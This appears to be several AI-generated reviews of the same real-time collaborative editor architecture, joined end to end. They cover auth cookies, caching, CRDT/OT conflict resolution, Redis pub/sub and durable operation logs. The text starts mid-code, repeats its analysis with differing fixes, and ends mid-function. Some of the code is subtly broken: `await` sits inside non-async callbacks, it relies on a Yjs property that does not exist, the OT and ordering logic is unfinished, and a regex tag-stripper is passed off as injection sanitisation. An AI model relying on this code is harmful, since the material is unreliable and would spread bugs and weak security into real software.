issuer: 'https://yourdomain.com',
audience: 'api'
}
);
const refreshToken = jwt.sign(
{ sub: user.id },
REFRESH_SECRET,
{ expiresIn: '7d' }
);
res.cookie('jwt', token, {
httpOnly: true,
secure: true,
sameSite: 'strict',
maxAge: 15 * 60 * 1000
});
res.cookie('refreshToken', refreshToken, {
httpOnly: true,
secure: true,
sameSite: 'strict',
maxAge: 7 * 24 * 60 * 60 * 1000
});
res.json({ success: true });
});
// Logout endpoint
app.post('/logout', async (req, res) => {
const token = req.cookies.jwt;
const decoded = jwt.decode(token);
// Revoke token immediately
await redis.setex(`revoked:${decoded.jti}`, 15 * 60, '1');
res.clearCookie('jwt');
res.clearCookie('refreshToken');
res.json({ success: true });
});
// Refresh token endpoint
app.post('/refresh', (req, res) => {
const refreshToken = req.cookies.refreshToken;
try {
const decoded = jwt.verify(refreshToken, REFRESH_SECRET);
const newToken = jwt.sign(
{ sub: decoded.sub, jti: crypto.randomUUID() },
SECRET,
{ expiresIn: '15m' }
);
res.cookie('jwt', newToken, {
httpOnly: true,
secure: true,
sameSite: 'strict',
maxAge: 15 * 60 * 1000
});
res.json({ success: true });
} catch (err) {
res.status(401).json({ error: 'Invalid refresh token' });
}
});
Problem: Caching API responses breaks real-time collaboration.
Scenario:
T0: User A requests document state → Server returns "Hello"
T1: User B edits document to "Hello World"
T2: User A refreshes page within 5 minutes
T3: CloudFront returns cached "Hello" (stale data)
T4: User A continues editing from stale state
T5: Conflict when both edits merge
Solutions:
| Solution | Trade-offs |
|---|---|
| Remove API caching entirely (Cache-Control: no-cache) | +Always fresh, -Increases origin load, -Slower for read-heavy workloads |
| Separate CDN for static assets only | +Caches CSS/JS, -Doesn't cache API, -More complex routing |
| Cache API by document version | +Can cache longer, -Invalidation complexity, -Requires version headers |
| Use Cache-Control: private, max-age=0 | +Browser still caches, -CDN doesn't cache, -Minimal benefit |
Recommended: Separate CDN tiers:
// Static assets (cacheable)
app.use(express.static('public', {
setHeaders: (res, path) => {
if (path.endsWith('.js') || path.endsWith('.css')) {
res.setHeader('Cache-Control', 'public, max-age=31536000, immutable');
// Include hash in filename for cache busting
}
}
}));
// API endpoints (not cacheable)
app.get('/api/documents/:docId', (req, res) => {
res.setHeader('Cache-Control', 'no-cache, no-store, must-revalidate');
res.setHeader('Pragma', 'no-cache');
res.setHeader('Expires', '0');
// Return document
});
// CloudFront configuration
// - Whitelist only static asset paths for caching
// - API paths bypass cache entirely
// - Use separate behaviors for different path patterns
Problem: Current LWW is too naive for real-time collaboration.
Document: "abcdef"
User A: Delete "c" (index 2) → "abdef"
User B: Insert "X" at index 3 → "abcXdef"
What should happen?
- If A deletes first: "abXdef" (B's insertion shifts)
- If B inserts first: "abdXef" (A deletes from new position)
LWW just picks one completely, losing the other edit
Solutions:
| Solution | Trade-offs |
|---|---|
| Implement OT (Operational Transform) | +Battle-tested (Google Docs), +Handles overlapping edits, -Complex (200+ LOC minimum), -Difficult to debug |
| Use CRDT library (Yjs/Automerge) | +Automatic merging, +Offline support, +Simpler than OT, -Larger message sizes, -Memory overhead |
| Pessimistic locking | +Prevents conflicts, -Reduces concurrency, -Poor UX (users wait for locks) |
Recommended: Yjs (already mentioned in #3, but critical enough to restate):
// With Yjs, this just works
const ydoc = new Y.Doc();
const ytext = ydoc.getText('content');
// User A
ytext.delete(2, 1); // Delete "c"
// User B (concurrent)
ytext.insert(3, 'X'); // Insert "X"
// Result: "abXdef" (deterministic, both edits preserved)
Problem: Users don't know who else is editing or where.
Risks:
Solutions:
| Solution | Trade-offs |
|---|---|
| Cursor presence via WebSocket | +Real-time, +Low latency, -Requires tracking per connection |
| Activity log in sidebar | +Shows recent edits, -Not real-time, -Requires polling |
| Collaborative cursors library | +Battle-tested, +Integrates with CRDT, -Adds dependencies |
Recommended: Yjs with y-protocols for awareness:
import * as Y from 'yjs';
import * as awarenessProtocol from 'y-protocols/awareness';
const ydoc = new Y.Doc();
const awareness = ydoc.awareness;
// Broadcast local state
awareness.setLocalState({
user: {
name: currentUser.name,
color: currentUser.color,
clientID: ydoc.clientID
},
cursor: {
anchor: 0,
head: 5
}
});
// Listen for remote changes
awareness.on('change', changes => {
changes.forEach(clientID => {
const state = awareness.getStates().get(clientID);
if (state) {
renderRemoteCursor(clientID, state.cursor);
}
});
});
Problem: Users lose connection → edits are lost.
Solutions:
| Solution | Trade-offs |
|---|---|
| Local storage queue + retry | +Simple, -Manual sync logic, -Data loss on browser crash |
| Service Worker + IndexedDB | +Works offline, +Syncs on reconnect, -Browser storage limits, -Complexity |
| CRDT with local persistence | +Automatic sync, +Works offline, +Yjs has built-in support, -Larger payload |
Recommended: Yjs with IndexedDB persistence:
import * as Y from 'yjs';
import { IndexeddbPersistence } from 'y-indexeddb';
const ydoc = new Y.Doc();
const persistence = new IndexeddbPersistence('document-id', ydoc);
persistence.whenSynced.then(() => {
console.log('Loaded from IndexedDB');
});
// Works offline: edits stored in IndexedDB
ytext.insert(0, 'offline edit');
// On reconnect: automatically syncs via WebSocket
Problem: User reconnects → routed to different server → loses WebSocket state.
Scenario:
Request 1: User A → Load Balancer → Server 1 (WebSocket connected)
Request 2: User A → Load Balancer → Server 2 (no WebSocket state)
Result: User A's edits don't broadcast to their own clients
Solutions:
| Solution | Trade-offs |
|---|---|
| Sticky sessions (IP hash or cookie) | +Keeps user on same server, -Uneven load distribution, -Server failures lose connections |
| Shared session store (Redis) | +Load balancer can distribute freely, +Server failures don't lose state, -Redis lookup per request |
| WebSocket gateway (e.g., Socket.io) | +Handles reconnection, +Automatic load balancing, -Additional latency |
Recommended: Sticky sessions + Redis fallback:
// Nginx config
upstream api_servers {
ip_hash; // Route based on client IP
server api1.internal:3000;
server api2.internal:3000;
server api3.internal:3000;
}
// Node.js: Store WebSocket metadata in Redis
const wsClients = new Map(); // Local cache
io.on('connection', (socket) => {
const userId = socket.handshake.auth.userId;
const serverId = process.env.SERVER_ID;
// Track locally
wsClients.set(userId, socket);
// Also store in Redis for failover
await redis.setex(
`ws:${userId}`,
3600,
JSON.stringify({ serverId, socketId: socket.id })
);
socket.on('disconnect', () => {
wsClients.delete(userId);
await redis.del(`ws:${userId}`);
});
});
// Broadcast to user (works across servers)
async function broadcastToUser(userId, message) {
// Try local first
const localSocket = wsClients.get(userId);
if (localSocket) {
localSocket.emit('update', message);
return;
}
// Check Redis for user's server
const wsInfo = await redis.get(`ws:${userId}`);
if (wsInfo) {
const { serverId } = JSON.parse(wsInfo);
// Publish to that server's Redis channel
await redis.publish(`user:${userId}:${serverId}`, JSON.stringify(message));
}
}
Problem: Malicious user can spam edits → DoS.
Attacker: Send 1000 edits/second
Result: Database overloaded, all users experience lag
Solutions:
| Solution | Trade-offs |
|---|---|
| Token bucket per user | +Fair, +Configurable, -Requires tracking per user |
| Redis rate limiter | +Fast, +Distributed, -Redis lookup per request |
| Adaptive rate limiting | +Responds to load, -More complex |
Recommended: Redis token bucket:
async function checkRateLimit(userId, docId) {
const key = `ratelimit:${userId}:${docId}`;
const limit = 100; // 100 edits per minute
const window = 60;
const current = await redis.incr(key);
if (current === 1) {
await redis.expire(key, window);
}
if (current > limit) {
throw new Error('Rate limit exceeded');
}
}
// Use in edit handler
io.on('connection', (socket) => {
socket.on('edit', async (data) => {
try {
await checkRateLimit(socket.userId, data.docId);
await handleEdit(data);
} catch (err) {
socket.emit('error', { message: 'Rate limit exceeded' });
}
});
});
Problem: Can't answer "who changed what when" or recover from mistakes.
Solutions:
| Solution | Trade-offs |
|---|---|
| Store all changes in audit table | +Complete history, +Can restore any version, -Storage overhead |
| Event sourcing | +Audit trail is primary source, +Can replay, -Architectural change |
| Immutable log (Kafka) | +Durable, +Scalable, -Operational complexity |
Recommended: Audit table (simple):
async function saveChange(docId, change, userId) {
const changeId = crypto.randomUUID();
await db.query(
`INSERT INTO document_changes
(id, doc_id, user_id, change_data, created_at)
VALUES ($1, $2, $3, $4, NOW())`,
[changeId, docId, userId, JSON.stringify(change)]
);
return changeId;
}
// Query audit trail
async function getHistory(docId, limit = 100) {
return db.query(
`SELECT id, user_id, change_data, created_at
FROM document_changes
WHERE doc_id = $1
ORDER BY created_at DESC
LIMIT $2`,
[docId, limit]
);
}
// Restore to specific point
async function restoreToVersion(docId, changeId) {
const changes = await db.query(
`SELECT change_data FROM document_changes
WHERE doc_id = $1 AND created_at <=
(SELECT created_at FROM document_changes WHERE id = $2)
ORDER BY created_at`,
[docId, changeId]
);
let doc = {};
changes.rows.forEach(row => {
doc = applyChange(doc, JSON.parse(row.change_data));
});
return doc;
}
Problem: What if two users rename the same document simultaneously?
Solutions:
Problem: User reads stale data from replica.
Solutions:
Problem: Database corruption → all documents lost.
Solutions:
| Issue | Severity | Root Cause | Recommended Fix | Effort |
|---|---|---|---|---|
| Split-brain sync | CRITICAL | No inter-server messaging | Redis Pub/Sub | Medium |
| Client clock skew | CRITICAL | Client-side timestamps | Server sequence numbers | Low |
| LWW data loss | CRITICAL | Naive conflict resolution | CRDT (Yjs) | High |
| Polling scalability | CRITICAL | 50k QPS polling | Redis Pub/Sub | Medium |
| Snapshot data loss | CRITICAL | 30s window | Event sourcing | Medium |
| Auth bypass | CRITICAL | localStorage + cache | httpOnly + short-lived tokens | Medium |
| API caching | CRITICAL | CloudFront on dynamic data | Separate static/API CDN | Low |
| No OT/CRDT | MAJOR | Naive conflict resolution | Yjs library | High |
| No offline support | MAJOR | Missing persistence | IndexedDB + Yjs | Medium |
| Sticky sessions | MAJOR | Round-robin LB | IP hash + Redis | Low |
| No rate limiting | MAJOR | Missing limits | Redis token bucket | Low |
| No audit trail | MAJOR | Missing logging | Audit table | Low |
The architecture needs a complete overhaul of the sync/conflict resolution layer. Start with Redis Pub/Sub + Yjs CRDT, then address auth and persistence.
I'll analyze this architecture systematically, identifying critical issues and proposing solutions.
Issue: Changes are only broadcast to clients connected to the same server. Users on different servers experience 2+ second delays. Solution: Implement Redis Pub/Sub or message queue (RabbitMQ/Kafka)
// Current problem
server1.broadcast(change); // Only server1 clients see this immediately
// Solution
redis.publish('doc:123:changes', change); // All servers receive instantly
Trade-offs:
Issue: Client clocks can differ by seconds/minutes, making last-write-wins unreliable Solution: Use Hybrid Logical Clocks (HLC) or server-assigned timestamps
// Problem
{ text: "Hello", timestamp: clientTime } // Client A: 14:30:00
{ text: "World", timestamp: clientTime } // Client B: 14:29:55 (clock behind)
// Solution with HLC
{ text: "Hello", hlc: { time: serverTime, counter: 1, clientId: "A" }}
Trade-offs:
Issue: 30-second save intervals risk losing up to 30 seconds of work Solution: Implement write-ahead log (WAL) with operation-based storage
// Store operations immediately
operations: [
{ op: 'insert', pos: 45, text: 'Hello', timestamp: ... },
{ op: 'delete', pos: 50, length: 5, timestamp: ... }
]
// Snapshot periodically for performance
Trade-offs:
Issue: N servers polling every 2 seconds = N queries/2 seconds Solution: Replace with PostgreSQL LISTEN/NOTIFY or change data capture (CDC)
-- Real-time notifications
NOTIFY document_changes, '{"docId": 123, "change": {...}}';
-- Or use logical replication/CDC tools like Debezium
Trade-offs:
Issue: Paragraph-level last-write-wins loses collaborative edits Solution: Implement OT or CRDTs (Conflict-free Replicated Data Types)
// Current: entire paragraph replaced
User A: "The quick brown fox"
User B: "The quick brown fox jumps"
Result: One user's changes lost
// With OT: operations transformed
Op A: insert(4, "very ")
Op B: insert(19, " jumps")
Result: "The very quick brown fox jumps"
Trade-offs:
Issue: No reconnection strategy; load balancer may route reconnections to different servers Solution: Implement sticky sessions or connection state management
// Connection state in Redis
redis.hset(`user:${userId}:connections`, {
serverId: 'server-1',
docId: 123,
lastSeenOperation: 456
});
// On reconnect, route to same server or sync state
Trade-offs:
Issue: 24-hour expiry in localStorage vulnerable to XSS; no refresh mechanism Solution: Shorter-lived tokens with refresh tokens in httpOnly cookies
// Access token: 15 minutes, memory only
// Refresh token: 7 days, httpOnly cookie
// Implement token rotation on refresh
Trade-offs:
Issue: 5-minute API cache can serve stale document data Solution: Implement cache tags and targeted invalidation
// Tag responses
res.headers['Cache-Tag'] = `doc-${docId}`;
// Invalidate on changes
cdn.purge({ tags: [`doc-${docId}`] });
Trade-offs:
Issue: Every keystroke writes to PostgreSQL Solution: Buffer changes in Redis, batch write to PostgreSQL
// Buffer in Redis
redis.lpush(`doc:${docId}:pending`, change);
// Batch write every 100ms or 10 operations
const batch = await redis.lrange(`doc:${docId}:pending`, 0, -1);
await postgres.insertBatch(batch);
Trade-offs:
Issue: Users can't see who else is editing Solution: Implement presence system with cursor positions
// Track active users and cursor positions
presence: {
users: {
'user1': { cursor: 145, selection: null, color: '#FF5733' },
'user2': { cursor: 89, selection: [89, 94], color: '#33FF57' }
}
}
Trade-offs:
This architecture would be suitable for small-scale use but needs these fundamental changes to scale reliably for a production Google Docs-like system.
Problem: Users connected to different API servers experience 2+ second delays due to polling mechanism, creating divergent document states and poor collaboration experience.
Solution: Implement Redis Pub/Sub or dedicated message broker (RabbitMQ/Kafka)
Problem: Client clock differences cause incorrect last-write-wins resolution, potentially losing recent edits.
Solution: Hybrid Vector Clocks + Server Timestamps
{
serverTimestamp: 1234567890,
vectorClock: {userId1: 5, userId2: 3},
operation: {...}
}
Problem: System crash or network partition can lose up to 30 seconds of work.
Solution: Implement Operation Log with Checkpointing
Problem: Server crash causes all clients to reconnect simultaneously, overwhelming remaining servers.
Solution: Exponential Backoff with Jitter + Connection Pooling
reconnectDelay = Math.min(baseDelay * Math.pow(2, attempt) + random(0, 1000), maxDelay)
Problem: Concurrent edits to same paragraph with last-write-wins causes character-level corruption.
Solution: Implement Proper OT or CRDT (Yjs/Automerge)
Problem: All changes funnel through single master database, limiting throughput.
Solution: Write-Through Cache + Async Batch Writes
// Buffer operations in Redis, batch write to PostgreSQL
await redis.lpush(`doc:${docId}:ops`, operation);
// Background job processes queue every 100ms or 100 operations
Problem: localStorage tokens vulnerable to XSS, no refresh mechanism, 24-hour window too long.
Solution: httpOnly Cookies + Refresh Token Pattern
Problem: 5-minute API response caching can serve stale document data.
Solution: Cache-Control Headers + Versioned Endpoints
Cache-Control: private, max-age=0, must-revalidate
ETag: "document-version-hash"
Problem: Large organizations create hotspots, limiting scalability.
Solution: Consistent Hashing with Virtual Nodes
Problem: Users can't see who else is editing, leading to conflicts.
Solution: Cursor Position Broadcasting + Presence Service
Each fix should be implemented incrementally with feature flags for safe rollout and rollback capability.
This architecture has several critical issues that will cause data loss, poor user experience, and scaling problems. Let me analyze each systematically.
The Problem: Using client clocks for conflict resolution is fundamentally broken. Client clocks can be wrong by hours, days, or even years.
Timeline (Server Time):
10:00:00 - Alice types "Hello" (Alice's clock says 15:00:00)
10:00:01 - Bob types "World" (Bob's clock says 09:00:00)
Result: Alice's edit wins because 15:00:00 > 09:00:00
Bob's edit is silently discarded, even though it came AFTER Alice's
Real-world scenarios that break this:
Solution: Hybrid Logical Clocks (HLC) or Server-Assigned Lamport Timestamps
// Hybrid Logical Clock implementation
interface HLC {
wallTime: number; // Physical time from server
logical: number; // Logical counter for ordering
nodeId: string; // Tie-breaker for simultaneous events
}
class HybridLogicalClock {
private wallTime: number = 0;
private logical: number = 0;
private nodeId: string;
constructor(nodeId: string) {
this.nodeId = nodeId;
}
// Called when sending an event
tick(): HLC {
const now = Date.now();
if (now > this.wallTime) {
this.wallTime = now;
this.logical = 0;
} else {
this.logical++;
}
return { wallTime: this.wallTime, logical: this.logical, nodeId: this.nodeId };
}
// Called when receiving an event
receive(remote: HLC): HLC {
const now = Date.now();
if (now > this.wallTime && now > remote.wallTime) {
this.wallTime = now;
this.logical = 0;
} else if (this.wallTime > remote.wallTime) {
this.logical++;
} else if (remote.wallTime > this.wallTime) {
this.wallTime = remote.wallTime;
this.logical = remote.logical + 1;
} else {
// Equal wall times
this.logical = Math.max(this.logical, remote.logical) + 1;
}
return { wallTime: this.wallTime, logical: this.logical, nodeId: this.nodeId };
}
// Compare two HLCs
static compare(a: HLC, b: HLC): number {
if (a.wallTime !== b.wallTime) return a.wallTime - b.wallTime;
if (a.logical !== b.logical) return a.logical - b.logical;
return a.nodeId.localeCompare(b.nodeId);
}
}
Trade-offs:
| Approach | Pros | Cons |
|---|---|---|
| HLC | Preserves causality, tolerates clock drift | Slightly more complex, ~24 bytes per timestamp |
| Server timestamps only | Simple | Doesn't capture happens-before relationships |
| Vector clocks | Perfect causality tracking | O(n) space where n = number of clients |
The Problem: When two users edit the same paragraph, one user's work is completely discarded.
Original paragraph: "The quick brown fox"
Alice (10:00:00): Changes to "The quick brown fox jumps"
Bob (10:00:01): Changes to "The slow brown fox"
Result: "The slow brown fox"
Alice's addition of "jumps" is silently lost
Solution: Operational Transformation (OT) or CRDTs
For a Google Docs-like experience, OT is the industry standard:
// Operational Transformation for text
type Operation =
| { type: 'retain'; count: number }
| { type: 'insert'; text: string }
| { type: 'delete'; count: number };
class OTDocument {
private content: string = '';
private revision: number = 0;
// Transform operation A against operation B
// Returns A' such that apply(apply(doc, B), A') === apply(apply(doc, A), B')
static transform(a: Operation[], b: Operation[]): [Operation[], Operation[]] {
const aPrime: Operation[] = [];
const bPrime: Operation[] = [];
let indexA = 0, indexB = 0;
let opA = a[indexA], opB = b[indexB];
while (opA || opB) {
// Insert operations go first
if (opA?.type === 'insert') {
aPrime.push(opA);
bPrime.push({ type: 'retain', count: opA.text.length });
opA = a[++indexA];
continue;
}
if (opB?.type === 'insert') {
bPrime.push(opB);
aPrime.push({ type: 'retain', count: opB.text.length });
opB = b[++indexB];
continue;
}
// Both are retain or delete - handle based on lengths
// ... (full implementation would handle all cases)
}
return [aPrime, bPrime];
}
// Apply operation to document
apply(ops: Operation[]): void {
let index = 0;
let newContent = '';
for (const op of ops) {
switch (op.type) {
case 'retain':
newContent += this.content.slice(index, index + op.count);
index += op.count;
break;
case 'insert':
newContent += op.text;
break;
case 'delete':
index += op.count;
break;
}
}
newContent += this.content.slice(index);
this.content = newContent;
this.revision++;
}
}
// Server-side OT handling
class OTServer {
private document: OTDocument;
private history: Operation[][] = [];
receiveOperation(clientRevision: number, ops: Operation[]): Operation[] {
// Transform against all operations that happened since client's revision
let transformedOps = ops;
for (let i = clientRevision; i < this.history.length; i++) {
const [newOps] = OTDocument.transform(transformedOps, this.history[i]);
transformedOps = newOps;
}
this.document.apply(transformedOps);
this.history.push(transformedOps);
return transformedOps;
}
}
Alternative: CRDTs (Conflict-free Replicated Data Types)
// Simplified RGA (Replicated Growable Array) CRDT for text
interface RGANode {
id: { timestamp: HLC; nodeId: string };
char: string | null; // null = tombstone (deleted)
parent: RGANode['id'] | null;
}
class RGADocument {
private nodes: Map<string, RGANode> = new Map();
private clock: HybridLogicalClock;
constructor(nodeId: string) {
this.clock = new HybridLogicalClock(nodeId);
}
insert(position: number, char: string): RGANode {
const parentId = this.getNodeAtPosition(position - 1)?.id ?? null;
const node: RGANode = {
id: { timestamp: this.clock.tick(), nodeId: this.clock['nodeId'] },
char,
parent: parentId
};
this.nodes.set(this.nodeIdToString(node.id), node);
return node;
}
delete(position: number): void {
const node = this.getNodeAtPosition(position);
if (node) node.char = null; // Tombstone
}
merge(remoteNode: RGANode): void {
const key = this.nodeIdToString(remoteNode.id);
if (!this.nodes.has(key)) {
this.nodes.set(key, remoteNode);
this.clock.receive(remoteNode.id.timestamp);
}
}
getText(): string {
return this.getOrderedNodes()
.filter(n => n.char !== null)
.map(n => n.char)
.join('');
}
private nodeIdToString(id: RGANode['id']): string {
return `${id.timestamp.wallTime}-${id.timestamp.logical}-${id.nodeId}`;
}
private getOrderedNodes(): RGANode[] {
// Topological sort based on parent relationships
// with timestamp as tie-breaker
// ... implementation
}
}
Trade-offs:
| Approach | Pros | Cons |
|---|---|---|
| OT | Compact operations, well-understood | Requires central server for ordering, complex transform functions |
| CRDT | Decentralized, works offline | Larger metadata overhead, tombstones accumulate |
| Last-write-wins | Simple | Loses data |
Recommendation: Use OT for real-time sync (like Google Docs does) with CRDT for offline support.
The Problem: With round-robin load balancing, users on the same document connect to different servers. Changes only broadcast to clients on the SAME server.
Document: "Project Proposal"
Server A: Server B:
├── Alice (editing) ├── Bob (editing)
└── Charlie (viewing) └── Diana (viewing)
Alice types "Hello" → Charlie sees it immediately
→ Bob and Diana wait up to 2 seconds (polling interval)
This creates a jarring, inconsistent experience where some users see real-time updates and others see delayed updates.
Solution: Redis Pub/Sub for Cross-Server Broadcasting
import Redis from 'ioredis';
import { WebSocket } from 'ws';
class DocumentSyncService {
private redisPub: Redis;
private redisSub: Redis;
private localClients: Map<string, Set<WebSocket>> = new Map();
private serverId: string;
constructor() {
this.serverId = crypto.randomUUID();
this.redisPub = new Redis(process.env.REDIS_URL);
this.redisSub = new Redis(process.env.REDIS_URL);
this.setupSubscriptions();
}
private setupSubscriptions(): void {
this.redisSub.psubscribe('doc:*', (err) => {
if (err) console.error('Failed to subscribe:', err);
});
this.redisSub.on('pmessage', (pattern, channel, message) => {
const documentId = channel.replace('doc:', '');
const parsed = JSON.parse(message);
// Don't re-broadcast our own messages
if (parsed.serverId === this.serverId) return;
this.broadcastToLocalClients(documentId, parsed.payload);
});
}
async publishChange(documentId: string, change: DocumentChange): Promise<void> {
const message = JSON.stringify({
serverId: this.serverId,
payload: change,
timestamp: Date.now()
});
// Publish to Redis for other servers
await this.redisPub.publish(`doc:${documentId}`, message);
// Also broadcast to local clients
this.broadcastToLocalClients(documentId, change);
}
private broadcastToLocalClients(documentId: string, change: DocumentChange): void {
const clients = this.localClients.get(documentId);
if (!clients) return;
const message = JSON.stringify(change);
for (const client of clients) {
if (client.readyState === WebSocket.OPEN) {
client.send(message);
}
}
}
registerClient(documentId: string, ws: WebSocket): void {
if (!this.localClients.has(documentId)) {
this.localClients.set(documentId, new Set());
}
this.localClients.get(documentId)!.add(ws);
ws.on('close', () => {
this.localClients.get(documentId)?.delete(ws);
});
}
}
Alternative: Sticky Sessions with Consistent Hashing
// Nginx configuration for sticky sessions based on document ID
/*
upstream api_servers {
hash $arg_documentId consistent;
server api1:3000;
server api2:3000;
server api3:3000;
}
*/
// Or implement in application load balancer
class DocumentAwareLoadBalancer {
private servers: string[];
private hashRing: ConsistentHashRing;
constructor(servers: string[]) {
this.servers = servers;
this.hashRing = new ConsistentHashRing(servers, 150); // 150 virtual nodes
}
getServerForDocument(documentId: string): string {
return this.hashRing.getNode(documentId);
}
// Handle server failures gracefully
removeServer(server: string): void {
this.hashRing.removeNode(server);
// Clients will reconnect and get routed to new server
}
}
Trade-offs:
| Approach | Pros | Cons |
|---|---|---|
| Redis Pub/Sub | Decoupled servers, any server can handle any doc | Additional infrastructure, Redis becomes SPOF |
| Sticky sessions | Simpler, no cross-server communication | Uneven load, complex failover |
| Dedicated doc servers | Best performance per document | Complex routing, underutilization |
The Problem: Even with Redis Pub/Sub, the architecture mentions polling PostgreSQL every 2 seconds as a fallback. This creates:
Solution: Event-Driven Architecture with PostgreSQL LISTEN/NOTIFY
import { Pool, Client } from 'pg';
class PostgresChangeNotifier {
private listenerClient: Client;
private pool: Pool;
private handlers: Map<string, Set<(change: any) => void>> = new Map();
async initialize(): Promise<void> {
this.listenerClient = new Client(process.env.DATABASE_URL);
await this.listenerClient.connect();
await this.listenerClient.query('LISTEN document_changes');
this.listenerClient.on('notification', (msg) => {
if (msg.channel === 'document_changes' && msg.payload) {
const change = JSON.parse(msg.payload);
this.notifyHandlers(change.document_id, change);
}
});
}
subscribe(documentId: string, handler: (change: any) => void): () => void {
if (!this.handlers.has(documentId)) {
this.handlers.set(documentId, new Set());
}
this.handlers.get(documentId)!.add(handler);
// Return unsubscribe function
return () => {
this.handlers.get(documentId)?.delete(handler);
};
}
private notifyHandlers(documentId: string, change: any): void {
const handlers = this.handlers.get(documentId);
if (handlers) {
for (const handler of handlers) {
handler(change);
}
}
}
}
// Database trigger to send notifications
/*
CREATE OR REPLACE FUNCTION notify_document_change()
RETURNS TRIGGER AS $$
BEGIN
PERFORM pg_notify(
'document_changes',
json_build_object(
'document_id', NEW.document_id,
'operation_id', NEW.id,
'operation', NEW.operation,
'revision', NEW.revision
)::text
);
RETURN NEW;
END;
$$ LANGUAGE plpgsql;
CREATE TRIGGER document_change_trigger
AFTER INSERT ON document_operations
FOR EACH ROW EXECUTE FUNCTION notify_document_change();
*/
The Problem: If a server crashes, up to 30 seconds of work is lost. For a real-time editor, this is catastrophic.
Timeline:
00:00 - Snapshot saved
00:15 - Alice types 500 words
00:29 - Server crashes
00:30 - Server restarts
Result: Alice's 500 words are gone forever
Solution: Operation Log with Periodic Compaction
interface DocumentOperation {
id: string;
documentId: string;
userId: string;
revision: number;
operation: Operation[]; // OT operations
timestamp: HLC;
checksum: string;
}
class DurableDocumentStore {
private pool: Pool;
private redis: Redis;
async applyOperation(op: DocumentOperation): Promise<void> {
const client = await this.pool.connect();
try {
await client.query('BEGIN');
// 1. Append to operation log (durable)
await client.query(`
INSERT INTO document_operations
(id, document_id, user_id, revision, operation, timestamp, checksum)
VALUES ($1, $2, $3, $4, $5, $6, $7)
`, [op.id, op.documentId, op.userId, op.revision,
JSON.stringify(op.operation), op.timestamp, op.checksum]);
// 2. Update materialized view (for fast reads)
await client.query(`
UPDATE documents
SET current_revision = $1,
last_modified = NOW(),
content = apply_operation(content, $2)
WHERE id = $3 AND current_revision = $4
`, [op.revision, JSON.stringify(op.operation), op.documentId, op.revision - 1]);
await client.query('COMMIT');
// 3. Cache in Redis for real-time sync
await this.redis.xadd(
`doc:${op.documentId}:ops`,
'MAXLEN', '~', '10000', // Keep last ~10k operations
'*',
'data', JSON.stringify(op)
);
} catch (error) {
await client.query('ROLLBACK');
throw error;
} finally {
client.release();
}
}
// Periodic compaction job
async compactDocument(documentId: string): Promise<void> {
const client = await this.pool.connect();
try {
await client.query('BEGIN');
// Get current state
const { rows: [doc] } = await client.query(
'SELECT content, current_revision FROM documents WHERE id = $1 FOR UPDATE',
[documentId]
);
// Create snapshot
await client.query(`
INSERT INTO document_snapshots (document_id, revision, content, created_at)
VALUES ($1, $2, $3, NOW())
`, [documentId, doc.current_revision, doc.content]);
// Delete old operations (keep last 1000 for undo history)
await client.query(`
DELETE FROM document_operations
WHERE document_id = $1
AND revision < $2 - 1000
`, [documentId, doc.current_revision]);
await client.query('COMMIT');
} finally {
client.release();
}
}
// Recover document from operations
async recoverDocument(documentId: string): Promise<string> {
// Find latest snapshot
const { rows: [snapshot] } = await this.pool.query(`
SELECT content, revision FROM document_snapshots
WHERE document_id = $1
ORDER BY revision DESC LIMIT 1
`, [documentId]);
let content = snapshot?.content ?? '';
let fromRevision = snapshot?.revision ?? 0;
// Apply all operations since snapshot
const { rows: operations } = await this.pool.query(`
SELECT operation FROM document_operations
WHERE document_id = $1 AND revision > $2
ORDER BY revision ASC
`, [documentId, fromRevision]);
for (const op of operations) {
content = applyOperation(content, JSON.parse(op.operation));
}
return content;
}
}
Database Schema:
-- Immutable operation log
CREATE TABLE document_operations (
id UUID PRIMARY KEY,
document_id UUID NOT NULL REFERENCES documents(id),
user_id UUID NOT NULL REFERENCES users(id),
revision BIGINT NOT NULL,
operation JSONB NOT NULL,
timestamp JSONB NOT NULL, -- HLC
checksum VARCHAR(64) NOT NULL,
created_at TIMESTAMPTZ DEFAULT NOW(),
UNIQUE(document_id, revision)
);
-- Index for efficient replay
CREATE INDEX idx_doc_ops_replay
ON document_operations(document_id, revision);
-- Periodic snapshots for fast recovery
CREATE TABLE document_snapshots (
id UUID PRIMARY KEY DEFAULT gen_random_uuid(),
document_id UUID NOT NULL REFERENCES documents(id),
revision BIGINT NOT NULL,
content TEXT NOT NULL,
created_at TIMESTAMPTZ DEFAULT NOW(),
UNIQUE(document_id, revision)
);
-- Materialized current state (for fast reads)
CREATE TABLE documents (
id UUID PRIMARY KEY,
title VARCHAR(500),
content TEXT,
current_revision BIGINT DEFAULT 0,
created_at TIMESTAMPTZ DEFAULT NOW(),
last_modified TIMESTAMPTZ DEFAULT NOW()
);
Trade-offs:
| Approach | Pros | Cons |
|---|---|---|
| Operation log | Zero data loss, full history | Storage grows, need compaction |
| Frequent snapshots | Simple recovery | Still some data loss window |
| Write-ahead log | Database handles durability | Tied to specific database |
The Problem:
Solution: Structured Document Model with Delta Storage
// Structured document model (similar to ProseMirror/Slate)
interface DocumentNode {
type: 'doc' | 'paragraph' | 'heading' | 'list' | 'listItem' | 'text';
content?: DocumentNode[];
text?: string;
marks?: Mark[]; // bold, italic, link, etc.
attrs?: Record<string, any>;
}
interface Mark {
type: 'bold' | 'italic' | 'underline' | 'link' | 'code';
attrs?: Record<string, any>;
}
// Example document
const exampleDoc: DocumentNode = {
type: 'doc',
content: [
{
type: 'heading',
attrs: { level: 1 },
content: [{ type: 'text', text: 'My Document' }]
},
{
type: 'paragraph',
content: [
{ type: 'text', text: 'Hello ' },
{ type: 'text', text: 'world', marks: [{ type: 'bold' }] }
]
}
]
};
// Sanitization on input
class DocumentSanitizer {
private allowedNodeTypes = new Set([
'doc', 'paragraph', 'heading', 'list', 'listItem', 'text',
'blockquote', 'codeBlock', 'image', 'table', 'tableRow', 'tableCell'
]);
private allowedMarks = new Set([
'bold', 'italic', 'underline', 'strike', 'code', 'link'
]);
sanitize(node: DocumentNode): DocumentNode {
if (!this.allowedNodeTypes.has(node.type)) {
// Convert unknown types to paragraph
return { type: 'paragraph', content: this.sanitizeContent(node.content) };
}
return {
type: node.type,
...(node.text && { text: this.sanitizeText(node.text) }),
...(node.content && { content: this.sanitizeContent(node.content) }),
...(node.marks && { marks: this.sanitizeMarks(node.marks) }),
...(node.attrs && { attrs: this.sanitizeAttrs(node.type, node.attrs) })
};
}
private sanitizeText(text: string): string {
// Remove any potential script injections
return text.replace(/<[^>]*>/g, '');
}
private sanitizeMarks(marks: Mark[]): Mark[] {
